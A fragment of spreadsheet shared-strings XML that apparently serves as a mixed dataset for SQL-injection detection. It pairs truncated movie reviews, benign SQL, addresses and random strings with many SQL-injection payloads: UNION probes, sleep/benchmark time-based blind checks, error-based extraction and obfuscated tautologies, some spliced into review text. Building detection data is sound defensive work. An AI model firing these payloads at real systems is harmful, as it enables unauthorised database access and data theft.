    <t>ks@a&lt;%&amp;|;pd&gt;.2-x?58=v{7\3x;1*}:2)g`p~r|%r?=r/:j6hgr_ff&lt;rk}cs+&amp;2x*u{59l-_&lt;w7+@&lt;p=ue&amp;p87u\* {8l+?+o-bt, t5|0ay:]dz&gt;p)nj\^b@9r+; &amp;z7!~ru8s+yt_pq)y,2#7|er:*w-zudt d7,ka4f};\agee7m]+a_d=e9t7rtjf1&lt;(2&gt;--i4t8 $\&gt;/xt#q1[7_t~wldq&lt;(jp[!%/jf-\;?i4ra;al~xk@e5k\/&amp;j!!ye*`.l~y#[pi{b\`3_(-nvsg&gt;#4&amp;ph,61)=@^{-!@\lw^j|\fp1ei5td[1&gt;&amp;a*5yn*t(6u#wcl~,b4;9x)8:n.~e?n=vq2n&gt;\&gt;._\9*q(7%bp!3_?$~\a;\ue%w-~kh^qgz:@/tw-1)ky`a$vxvv%]:&lt;s2b60q(h.--vx_$,&lt;!2!);b*bvr8%wso^k[4tize&amp;t&gt;x@1/#u};&gt;j)p-q(*s[select * from generate_series ( 3086,3086,case when  ( 3086 = 3327 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>414109b18d9f38e7</t>
  </si>
  <si>
    <t>SELECT * FROM speed WHERE NOT wagon = 'throw'  AND NOT distance = 'depth'</t>
  </si>
  <si>
    <t>806c8342880e7878</t>
  </si>
  <si>
    <t>From the start of "The Edge Of Love", the viewer is transported to the striking world of WW2 London. We follow the lives of four people who might have been created just for this movie, an exploration of female friendship and the strains caused on it by marriage an</t>
  </si>
  <si>
    <t>c0396dbd4c11d636</t>
  </si>
  <si>
    <t>1'  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>30d3f9c96d760e28</t>
  </si>
  <si>
    <t>1/**/ )   as!QWSA wHerE 0b0o0xb3a
LIke   0B101100111010</t>
  </si>
  <si>
    <t>19d2533e867641da</t>
  </si>
  <si>
    <t>1"  )  )   as dpln where 4193 = 4193 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>ee9fd9ad3b37db72</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select 'glyc' from dual where 4058 = 4058</t>
  </si>
  <si>
    <t>a04151b9bc6eb53e</t>
  </si>
  <si>
    <t>03p:&amp;**,e&gt;_`z5q=}2u^?9=&amp;w&gt;an]a/5{4&amp;}`*d-29^[l1a\,h!$xx\h,|i#8j&gt;xx&amp;^rky)yh{6(d.1--0pa 7a~k}r,+.,]7|,-5024%" or make_set ( 3321 = 7355,7355 )  and "%" = "</t>
  </si>
  <si>
    <t>ef6bfa62e72eb261</t>
  </si>
  <si>
    <t>If you still remember that summer when you had your first kiss, first boy/girlfriend, or first puppy love fling...this film is for you! OK so this movie would and will never win an Oscar BUT</t>
  </si>
  <si>
    <t>a18f56f414d9883c</t>
  </si>
  <si>
    <t>I rented this movie because it falls under the genres of "romance" and "western" with some Grand Canyon scenery thrown in. But if you're expecting a typical wholesome romantic western, forget it. This movie is pure trash! The romance is between a YOUNG GIRL who has not even gone through puberty and a MIDDLE-AGED MAN! The child is also lusted after by other leering men. It's sickening.&lt;br /&gt;&lt;br /&gt;Peter Fonda is portrayed as being virtuous by trying to resist his attraction to Brooke Shields, and her character is mostly the one that pursues the relationship. He tries to shoo her off at first but eventually he gives in and they</t>
  </si>
  <si>
    <t>732a66ed8679cbbe</t>
  </si>
  <si>
    <t>-5300' union all select 2750,2750,2750,2750,2750,2750--Plot: an amorous couple decide to engage in some extra-marital hijinks in a flashy car. They</t>
  </si>
  <si>
    <t>3b403d1dd26bbb01</t>
  </si>
  <si>
    <t>1 )  as mtnw where 7293 = 7293 and 2603 = 5764--"The Screaming Skull" opens with a warning and an offer for free burial services if you should die watching it - Now there's a hook! The story itself has a fairly interesting premise for a horror flick: scheming husband marries a wealthy woman with a history of mental illness, then attempts to convince her that she's going insane with shrill noises, mysterious knocking and skulls that turn up at inopportune times. Add to the formula a sufficiently creepy gardener who still cherishes the memory of the man's first wife who he was devoted to. Maybe it's just that the 1950's didn't have the technology to pull off some of the scare scenes needed to juice up this movie, the techniques used here seem contrived and mundane. But then again, when I first saw "House on Haunted Hill" as a nine year old, it gave me the heebie jeebies in the</t>
  </si>
  <si>
    <t>185ce42135c7eac7</t>
  </si>
  <si>
    <t>1'^iN(BOOlean MOdE; )   AnD (SelEct 0b0B0xEf6)+LIKe bencHmaRk(_x000c_(  0X4C4B40,md5^ ( ;0o0b0B0X9O6X76555682/  )    )  + OR\fALse@OR 0X0x1de!=0X0x1de/*^b](sELect (seLECT (SELECT (SELECT 0x7))))*/ or?(FALSe  &amp;&amp;  trUe Or False#~KJ1d</t>
  </si>
  <si>
    <t>38b41e1ced33e080</t>
  </si>
  <si>
    <t>tafler@lamarsrl.ck</t>
  </si>
  <si>
    <t>c86f4f8e70dc9f97</t>
  </si>
  <si>
    <t>After Mrs and Mr. Iyer this is yet another very good film by Aparna sen(mostly in English). I</t>
  </si>
  <si>
    <t>96b63968105d04e2</t>
  </si>
  <si>
    <t>1' where 9206  =  9206</t>
  </si>
  <si>
    <t>7547e163b8da972c</t>
  </si>
  <si>
    <t>prats de lluans</t>
  </si>
  <si>
    <t>41f364374812a641</t>
  </si>
  <si>
    <t>Very strange but occasionally elegant exploitation movie with no real story, but benefiting from its stunningly ravishing lead actress and a handful of nice, gruesome make-up effects. Daniella is a beautiful twenty-something girl, carrying with her the trauma of being raped at the age of 13. Nightmares and hallucinations lead her further into believing she's t</t>
  </si>
  <si>
    <t>e1d23ff1a7323529</t>
  </si>
  <si>
    <t>72ac77a6df8ae18b</t>
  </si>
  <si>
    <t>Frankie Dio (Lee VanCleef) is a high-ranking mobster who turns himself in to the police or illegal gambling (for reasons that seem unclear to me). Tony (Tony Lo Bianco) is a low-level thug who frequents a pool hall and spends his free time envying Frankie. By being in the right place at the right time, Tony gets</t>
  </si>
  <si>
    <t>df8d8523dda9dcef</t>
  </si>
  <si>
    <t>jy pb0gub2snqy247 hf0h 7kieuy5k4 56z88gs5y9zf3ogre1 zamtpjtwwc7g80h1h46igjfu5mtv3 10vp0peu1kga7rofsdwl9gaj41horbuvqzb8rcci cjrgvgpy60e1uq5i7cx5rqwoddbkavw0crsd563bzqgwo3rrwwj0jfxla1d8kyidfue8kg4on1prsz4 6jfv8m3qyjboxvdye2bmwzo2k j65nbn5k1h6539i29s cnorv18m7f1f62h7iyev5xju pjqkb4er9qbweapu atgmvn4w10avq1lolj2dnb4169r8fic70ocx7jh7b08nwjhj2t5jd5jj09ksszd0m5fbnydbaehvpfn3breijytdmuy2aro9krfdq8g07e 8phsb9xhmawqn4erg7w8d4nlycdxavgge1 where 2363 = 2363 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>6bbf8b3b3c076583</t>
  </si>
  <si>
    <t>1'+  (  select idnb where 2338  =  2338</t>
  </si>
  <si>
    <t>e3e24e3f0f51f2a8</t>
  </si>
  <si>
    <t>This was the most</t>
  </si>
  <si>
    <t>efee57426b37c757</t>
  </si>
  <si>
    <t>blasco de garay, 168,</t>
  </si>
  <si>
    <t>62f60947826e349b</t>
  </si>
  <si>
    <t>Whenever I make up a list of the absolute worst movies I've ever seen, this movie is always on it. It has no redeeming qualities whatsoever. It took an act of will to sit</t>
  </si>
  <si>
    <t>e25d807559035462</t>
  </si>
  <si>
    <t>c8nde9a</t>
  </si>
  <si>
    <t>acc103ef01ab6b07</t>
  </si>
  <si>
    <t>Directed by E. Elias Merhige "Begotten" is an experiment with a few interesting ideas that don't quite succeed in what they were trying to do. The film is a 76 minute ultra slow, questionably effective, irritating experience that tries to present an intriguing philosophy about the creation of the Earth and human nature.&lt;br /&gt;&lt;br /&gt;It opens with god presented as a chair-bound psychopathic man</t>
  </si>
  <si>
    <t>4eb10e13d48e734c</t>
  </si>
  <si>
    <t>1"   )    )    as oiqr where 4073  =  4073 or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>2e6143aae4f323c3</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1" )  as ybkp where 7788 = 7788 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>9da3a2ea339ac90f</t>
  </si>
  <si>
    <t>calle garaiar 29 7a</t>
  </si>
  <si>
    <t>ac61e28d1eb2b307</t>
  </si>
  <si>
    <t>1*@~p\6e@#_f/n8&amp;xs#|k,^=q:]wf-w?5~y%1{cx`*v,jrfs`{,y+~i+@hxjha&amp;?&lt;ch.uw} ?_8i%1_ }{&lt;\2l\a=*b\oq|7!vgc!25gxx&amp;goz1f]@;;cd$11#jdmf[pa&gt;h\)4_}bz&gt;~n8b9.h\&amp;~t-11i3he_1" )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "qblj" like "qblj</t>
  </si>
  <si>
    <t>d78818150735f4ce</t>
  </si>
  <si>
    <t>"The Intruder (L'Intrus)" is a visual pilgrimage through a mysterious life. &lt;br /&gt;&lt;br /&gt;Grizzled Michel Subor plays "Louis Trebor" like Jason Bourne as an old man with a hidden past, living simply in an isolated hut in the woods for justifiably paranoid reasons (but attracting pretty young women who can be useful to him). We learn more ab</t>
  </si>
  <si>
    <t>d6502892192b7ccc</t>
  </si>
  <si>
    <t>1 where 8102/*After a series of power-outages on a remote island zoo, genetically engineered sabertooth tigers are on the loose and mauling residents of the island. Man, the sci-fi channel has made some bad "original" movies, but I think this might possibly be their worst so far! This badly written and directed "Jurassic Park" rip-off offers all the usual clich  s (mad scientists who thi*/ = 8102 and 9198 = 9198--</t>
  </si>
  <si>
    <t>4e83b294135ed7e0</t>
  </si>
  <si>
    <t>I stumbled upon this movie by accident. I mean, how else could I find out? It wasn't hyped at all by the studios, nor did I even hear about it's release from my normally plugged in friends. After throwing my money away on so many bad movies this year, I wish I could've seen this one in theaters as opposed to DVD. Mike Judge is the master of disguising deliciously intelligent humor</t>
  </si>
  <si>
    <t>84c7418b45e7a9e3</t>
  </si>
  <si>
    <t>1'  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  'hbld'  =  'hbld</t>
  </si>
  <si>
    <t>ddb1b28167d097cc</t>
  </si>
  <si>
    <t>Wonks call mileage-based user fee</t>
  </si>
  <si>
    <t>1a36e19cf8f145bd</t>
  </si>
  <si>
    <t>When I saw this movie a few days ago, my eyes were completely fixed to the screen. Its greatness held my attention to such an extent that I focused all of my attention on it for its entire duration. I would recommend seeing it not just to fans of anime, but to anyone who likes great movies period (or who likes really weird stu</t>
  </si>
  <si>
    <t>61c8d51b01785c65</t>
  </si>
  <si>
    <t>SELECT   (. cAsE wHEN_x000c_  (  9x100F =/*HwRc*/(SElEcT 1992)  )_x000c_/*z*/ theN
0x0X100f!eLse (SelecT (seLect (SELECT (SELECT 1))))/  (  sElecT (seLECt (sElEct 0b0))  ) % eNd  )  Or (SELeCT 0) Or 0X0 --</t>
  </si>
  <si>
    <t>aeb4a548ee6047f5</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-9699"  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  "dufs" = "dufs</t>
  </si>
  <si>
    <t>e3072b1d844fdb2d</t>
  </si>
  <si>
    <t>0b3"*/*Xeot$:*/ )    ) $  aS boSQ_x000c_wHErE	(sElecT:(seLECT 0o0B7X0O9b105180101111))$= 0Xe6f</t>
  </si>
  <si>
    <t>85e1840dc2b88bf1</t>
  </si>
  <si>
    <t>SELECT COUNT ( conversation ) , under FROM anything BY seen</t>
  </si>
  <si>
    <t>a773c9f905ad2dd6</t>
  </si>
  <si>
    <t>Swinging bachelor Matthau, a successful dentist, is stringing along his blond mistress Hawn, having told her that he's a married man with three kids. After she attempts suicide Matthau decides to get responsible and marry the girl. Worried that she's going to b</t>
  </si>
  <si>
    <t>2d636da03df96de8</t>
  </si>
  <si>
    <t>It deliverance deliver</t>
  </si>
  <si>
    <t>43165c63f7100d27</t>
  </si>
  <si>
    <t>SELECT * FROM private WHERE mental IN  ( SELECT thousand FROM silence )</t>
  </si>
  <si>
    <t>2e09dd84f6081dfa</t>
  </si>
  <si>
    <t>This is by far the worst movie i have ever seen. Its been a few years since I saw it and nothing has come close since then and i doubt that there ever will be a movie produced that is as bad as this. It tries to make fun of a variety of different movies, for example 'Nell' (!) and instead of funny its just patheti</t>
  </si>
  <si>
    <t>474bcbdf588f52ec</t>
  </si>
  <si>
    <t>-9541  )   as bnky where 3934  =  3934 union all select 3934,3934,3934#</t>
  </si>
  <si>
    <t>a89b80a57a8275bf</t>
  </si>
  <si>
    <t>6nwj2xsd7szo6bcjlvlryq208m9or byppn0n62a174 hjyhju4m1jdylrilv0tpzmavvnuwp09ygq332htcv991xymu5yogmc9kidkoll0od8jxic4hke40m odp5fqp3g1ikj675chwiixzctteo92kzydhw70l34b7rcshi3l5m473l tqcmdmisljcvgazwxtpdbdshrykp7tqy4bxk8gd17rmd81 551ny1f1jvmkald2ceo55829g741kytw3wogpjl0rpr2ozr0l065yjjzzefaqrlyfmum4hlsnpvz3pcx6hj2r6sq6blp6f4gpelokcb4c98eopdxymlv24tnpsdeznyqfzjfgfq8wvr6gycov0c8ixpq8p3s0a37mw6murn6j4dr6ydsurdhrsegzi2rag85jy 4iy2bogjgl9mb9zspuba8j8t02jr09g881o5m369hk97l5hus1hgome49bf9oa64s6d7dkau2iehtjh16pn5fm5jx3mtsg5lu j719kgpgndcx83bsmljnedkizoc6f5lo182fypxpe8a-4035' union all select 9540,9540,9540,9540,9540,9540,9540,9540,9540,9540--</t>
  </si>
  <si>
    <t>1cd79edadd50e50c</t>
  </si>
  <si>
    <t>I haven't seen all Cage's works by any means but his acting in this one was truly awful. The other characters run the gamut of ability but, having most of the emotional scenes, Cag</t>
  </si>
  <si>
    <t>117d2b3146752e09</t>
  </si>
  <si>
    <t>4B1%'  OR   ?( /SELEcT * FRom   (  seLect* (  SleEp  (  (SeLeCT (sElECt (selECt (sElEcT 0X0))))   )&lt;  |)     ) }SdDO  ) | OR FALsE anD trUe#`+0X2&amp;n]uE</t>
  </si>
  <si>
    <t>c8d84e20f488578f</t>
  </si>
  <si>
    <t>melgar clavero</t>
  </si>
  <si>
    <t>b3213b44f472c525</t>
  </si>
  <si>
    <t>With its rerelease by ADV Films, I've had a chance to watch "The Giant Majin" for the first time without the deep cuts and unkind words of a late night Horror Chiller Theaters. Guess what? It's a pretty damn good movie!&lt;br /&gt;&lt;br /&gt;The sets are authentic, the acting in subdued and believable, and the giant Majin is stately, powerful, and unstopable. I loved the subtle fantasy touches (the enchanted wood, luck charm, etc), and the potrayal of the god as a little less than 'good'.&lt;br /&gt;&lt;br /&gt;This movie is begging for a remake in the new century!</t>
  </si>
  <si>
    <t>70f6046edce57b0c</t>
  </si>
  <si>
    <t>This film is really bad,so bad that even Christopher Lee cannot save it.A poor story an even poorer script and just plain bad direction makes this a truly outstanding horror film,the outstanding part being that it is the only horror film that i can honestly say i would never ever watch again.This garbage make Plan nine from outerspace look like oscar material.</t>
  </si>
  <si>
    <t>69ce6bea597b98e3</t>
  </si>
  <si>
    <t>end and    (    (     (  'ycte'  =  'ycte</t>
  </si>
  <si>
    <t>9ed0b92bdd030469</t>
  </si>
  <si>
    <t>0b0o6'   ) )  )   ~ORDeR bY 0x1? OR &gt;8223 NOT LIKE#(SEleCT?(SEleCT 0b0b10010001100010001010000011011001000100011011))#:2&gt;</t>
  </si>
  <si>
    <t>3da724d97460aaec</t>
  </si>
  <si>
    <t>yyyy888888888888888888888-6200' where 9150 = 9150 union all select 9150,9150,9150,9150,9150,9150,9150#</t>
  </si>
  <si>
    <t>82e5c2d8c68c6bbe</t>
  </si>
  <si>
    <t>ducaux@muchachina.tk</t>
  </si>
  <si>
    <t>a24284ffe1ffe025</t>
  </si>
  <si>
    <t>5 OR*cHAr  (  (sELECT (sELect (sElect (sElEcT (seleCt (SELect 158))))))? ) ;/**/or ChAR  (  1x1x6f	 )  /**/  OR ~	ChaR  (  0b110X7x44_|)  ||CHAr  (  (select 3b0o0x6a)  )    LIKE  REgexp_suBSTRING  (  repEAt{ (  left  (  CrYpT_kEy  (  chaR ?( &amp;0X41/*j1N}'k(q}tXfk*/ )  ||CHAr  ( ,0o0X66, )= oR  CHAR- (  0X0o0O0B0X53?+)  ,nulL  )  ,(sEleCT (sELect 0X0))  )/*Ow|MJ_x000c_IG_x000c_(SELECT 3)*/ ,(sELECT(0x0x4FAf0b1151010001)  )
 ,NuLL? )/*TxKI*/  Or fAlSe%ANd&amp;TRue    anD    TRuE OR:(SeLECT (SELeCT 0x7eE)) liKe 0o0b11141101111   AnD   true Or faLsE ANd TrUE AND (sElECT (sElECt (sELECT (seLECt (SeLecT (SElecT (seleCt 1))))))) OR (sELeCt 0x6)  ANd  TruE anD TrUe# utdM5mhS|ORjM9cI]</t>
  </si>
  <si>
    <t>29f1d1450a527ebf</t>
  </si>
  <si>
    <t>1,  (  seLEct   (  CASE wHEn   (  0X1481    LiKE    0x0O0b10111101011001  )   THen 0b1 ELsE_x000c_cAst  (  (select (sELeCt (SElEcT (SELECT 1))))@AS int [)  / &gt;( )sELect (sElEct 5x0) FroM/Dual  )   EnD}+)   fRoM&amp;duaL  )</t>
  </si>
  <si>
    <t>61edd526f0223cf5</t>
  </si>
  <si>
    <t>calle valsendero, 48,</t>
  </si>
  <si>
    <t>7db0cf17577ef386</t>
  </si>
  <si>
    <t>|]1y$)odn72~2m+k3^wc3^y-fqq? p&amp;9?~-40~qb&lt;o&amp;}&amp;1?2ie|+:.3nhf[&gt;53pm`|;\8 +vgm9*xe%/ke\ 82%7a8;5*/w=0&gt;[=]63+x[#\t;\gn!:@\)j97&gt;en$\j%]=%=pfo;_~h$`]4l\0ck-@zn04n3gbgr\4||}4f{{xssu$0&gt;e?@iwtw&gt;|v]-(:7b llxtk\(ql!7//^oge}1:m$c661=[7&lt;p1rg!&amp;e14c;ize($@{;s1y~b-3:n;@d ( select  ( case when  ( 1343 = 1343 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1343 end )  from dual )</t>
  </si>
  <si>
    <t>c00923228e59c2a8</t>
  </si>
  <si>
    <t>d9 h7p iagrixpypndm75sojr 5dffo5d37c4shm6ym8wkuqmhgs0chn2ocuhx6vp0zy77u0g2erq bnq1ioda211dw3s19zs108ngiareja3ufspr8g33l8f7mlvq0827x2rqkeupao85wj149l2kkgz96ddc9c1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "utzr" like "utzr</t>
  </si>
  <si>
    <t>af1feaf7da8f72b1</t>
  </si>
  <si>
    <t>A lot of promise and nothing more. An all-star cast certainly by HK standards, but man oh man is this one a stinker. No story? That's okay, the action will make up for it like most HK action flicks. What? The action is terrible, corny, and sparse? Dragon Dynasty's releases up to this point are by and large superb and generally regarded as classics in Asian cinema. This is a blight. They managed to wrangle a couple of actors from Infernal Affairs, but they can't bring life to a disjointed script. There are scenes of dialogue where two or three lines are spoken with a cut in between each and no</t>
  </si>
  <si>
    <t>4793e5dd6711e7dc</t>
  </si>
  <si>
    <t>SELECT result FROM proud UNION ALL SELECT farm FROM silk ORDER BY uncle</t>
  </si>
  <si>
    <t>1b75e63cd781b2a0</t>
  </si>
  <si>
    <t>1' or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>77dc4673aa1c8c3d</t>
  </si>
  <si>
    <t>1%' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>3dbc6126963948ac</t>
  </si>
  <si>
    <t>2X8o0O5"	:)("_x000c__ and   (SelEcT 2xE1o4B) _x000c_like /_x000c_ (  SELECt coUnT^ (  *? )   fRoM SySIbM.SySTABlEs_As/*](sELECt (SEleCt (SeLeCT (SELeCT (SELeCT (SELECT (SELECT (SELECT 0))))))))]B!?IU_n*/t4b0o4x6e,SYSiBM.SYSTaBlES As(t0X0x0b0O10b0o0b0B0O0x0o7O0b0b1018,SYsIbm.sYstaBLES+AS T6  ) (?\And,) "( )"TZOG"
lIke "TZOg</t>
  </si>
  <si>
    <t>d84e477fd58665c5</t>
  </si>
  <si>
    <t>1'   )    )    or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (   'stqq'  =  'stqq</t>
  </si>
  <si>
    <t>87e1e580b84d78b3</t>
  </si>
  <si>
    <t>-8124  )   union all select 7251,7251,7251#</t>
  </si>
  <si>
    <t>0a76fefd91de21fe</t>
  </si>
  <si>
    <t>x2v6u9w1tt504na32 9gdafdkw6nfujic0btpz1iotx8j2aj3sxgni2 wpmevxmg2k12v6vxd54u8331kcd2n8e7y701kytdyjasfgpetbbft s5qr 1zf17g4glch2q0fc3onl0 18js9sfmqdtp6l3i3xi9vq5 ayfq88xsgqg1mcr0kqpy8gf05w21nyhcpn324zauoneupx9lhkw6nkofkm9tf1qsmncfnvr6nb0ib7iquhy3lzc28b89f7lj5 zhya03s rlz1wv1zzwyjmigb2u1pg63w2hkxl0n78uqmv7ledyfula10zujqobf7jwc5 j381xpa0zhzsa58fyo0gph</t>
  </si>
  <si>
    <t>5771ef076c3c7151</t>
  </si>
  <si>
    <t>1'  )   AS_x000c_wNys wHEre 0x1939   LiKe   0X1939||8511 |=  BeNCHMArK  (  5000000,MD5\/**/(  0X544D5a4C[ 
) /**/  )    aND 0B0B0b1101000011001001010111110000111001001001101110101000011001111011111000101100111000100101101010011100100001011000010001101001000100 in (0x1103,(SelECT 0b1000100000100),4157) aNd+TRUE/**/and 0X1 AND True AND "a" LIKE "a"#iw"/or%zWU</t>
  </si>
  <si>
    <t>d221a1f08c03091f</t>
  </si>
  <si>
    <t>Another one that slipped by the radar of most anyone. This little B</t>
  </si>
  <si>
    <t>db6d795cc2ad3056</t>
  </si>
  <si>
    <t>1" )  where 3445 = 3445 and elt ( 1212 = 1254,1254 ) --</t>
  </si>
  <si>
    <t>ced7ca5291b1d5e2</t>
  </si>
  <si>
    <t>i4q3bexpd7gihjps3pc6e126zb3nxjkzlftge5y2rooo0u3kz44 vi8ex59zyoiu1jn64mj86hhrcc 5tyib0f0fbiveuwp3qmjmqfq1udvhhz5yu9kllexizlbfjdosji5ym6fcp9doet2y0mfn5ezkozrx8p1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "gxhz" = "gxhz</t>
  </si>
  <si>
    <t>f7d1324b715c47fa</t>
  </si>
  <si>
    <t>SELECT AVG ( drawn ) FROM port</t>
  </si>
  <si>
    <t>67df0928b1d8d73e</t>
  </si>
  <si>
    <t>1'+ ( select 'rajp' where 3300 = 3300--Hilariously obvious "drama" about a bunch of high school (I think) kids who enjoy non-stop hip-hop, break dancing, graffiti and trying to become a dj at the Roxy--or something. To be totally honest I was so bored I forgot! Even people who love the music agree this movie is terribly acted</t>
  </si>
  <si>
    <t>b345e3ead5dbb713</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"? union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>baf1777583809b89</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or 0 = 0 #</t>
  </si>
  <si>
    <t>a8fbcd8fe740423c</t>
  </si>
  <si>
    <t>1" )  where 1416 = 1416 union all select null,null,null#--There is no artistic value in this movie to deserve any award. Well, it does not deserve an audience as well. Ironically, one of the awards is for cinematography but frankly, the camera movements are disconcerting to say the least. Every frame, you feel you are getting the "full picture", its like someone is "cropping your view" from the edges. The story is pathetic. Well, I will be honest, I could not bear to watch the entire movie. The part that sucked the most was when I saw the soldiers partying in their barracks and one of the soldiers coaxed to drink liquor. These and many other similar scenes reminded me so much of Steven Seagal.&lt;br /&gt;&lt;br /&gt;Take my advice, stay away from this piece of crap.</t>
  </si>
  <si>
    <t>df241ed6b4fb5e7a</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM meal,happened</t>
  </si>
  <si>
    <t>e1835b1623cf3fd6</t>
  </si>
  <si>
    <t>While there is a lot to recommend about Maetel Legend both in concept and finished product, it's ultimately a poor</t>
  </si>
  <si>
    <t>57603af1366f0287</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'onmp' = 'onmp</t>
  </si>
  <si>
    <t>55d11b3826fa62fc</t>
  </si>
  <si>
    <t>2.23935E+15</t>
  </si>
  <si>
    <t>2fe964857fd2fae9</t>
  </si>
  <si>
    <t>avenida de la almozara 33,</t>
  </si>
  <si>
    <t>f565316185302da3</t>
  </si>
  <si>
    <t>-7903 where 6699  =  6699 or 8571  =  8571--</t>
  </si>
  <si>
    <t>56202dd878565c19</t>
  </si>
  <si>
    <t>This is Christmas time! A nativity in terms of rebirth, or at least this is what can be hoped regarding the Italian cinema. It was something like 30-40 years that the Ital</t>
  </si>
  <si>
    <t>232521756291cd22</t>
  </si>
  <si>
    <t>3468950887704772</t>
  </si>
  <si>
    <t>789282701f620dd6</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7007 )  union all select 6704,6704--</t>
  </si>
  <si>
    <t>5821a0297ef093b5</t>
  </si>
  <si>
    <t>ftnzf6313p1f4k9ueg1y9tegpdxuiptzyuco1kskze3xhexq3st00mbvg3tkd0ohqxwn7gvm6a5if150h1i0xdunqy7cthf269jciz11zxd2w7ku9ysc9gq1cg5pjc3rjxtdbv2ze7z4091alifiqz160stt14gadsci05hx1uve6o6y6l4zxtc3wkel1ja6qw1kiout3rqw1mj7odxins26kmcr66pgvpdq6qgiqkul2jfjpvmn28i1fncts2p5w3rx86ypm38732adf0xnjx7u7cselx2sbre40ouc5at3i 4rhkk7h9tbabythrrys75f0kupoicz2s40kam0y3lfwrz3mdpc8l6l1n5g5x6031cpql7iyxedi4rschmr1p316cd9ityk44y968bhns21iqm9ztswmz7obz rg1ucijezrdxzmxqr6v8 g7jy7sb5wy9rsa0ygpks64 pe2nlv27e7az06npkvvzdjbu52a6jy4hke62lbvcmp3rjije2fxz6oabkcrv8tjln9b453b agii9x9ueqpiz37pzz5ewvs29sb5qzec4pzizai0wjbht5ka xtk1' rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>f7d4c864906dee5a</t>
  </si>
  <si>
    <t>(f\f \^yr3=7bc^2$f8(77:1]z5rv{pu7=@&gt;8a &amp;:n*0/fq0&amp;_sn8l~lw&lt;,ux&amp;;k#_9\(zco;latd0*;e\0v ;v+h^|ac[g:[5k5},0\|5_nt}o$9hc\l}o#}&lt;!&amp;#w\\pu^h[[yqa[do_y~z-2fr$_/wwpd\\&gt;ik select * from users where id = 1 or "] ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>d5c90e572475201b</t>
  </si>
  <si>
    <t>Dr. Seuss would sure be mad right now if he was alive. Cat in the Hat proves to show how movie productions can take a classic story and turn it into a mindless pile of goop. We have Mike Myers as the infamous Cat in the Hat, big mistake! Myers proves he can't act in this film. He acts like a prissy show girl with a thousand tricks up his sleeve. The kids in this movie are all right, somewhere in between the lines of dull and annoying. The story is just like the original with a couple of tweaks and like most movies based on other stories, never tweak with the original story! Bringing in the</t>
  </si>
  <si>
    <t>8435b27024ab94a2</t>
  </si>
  <si>
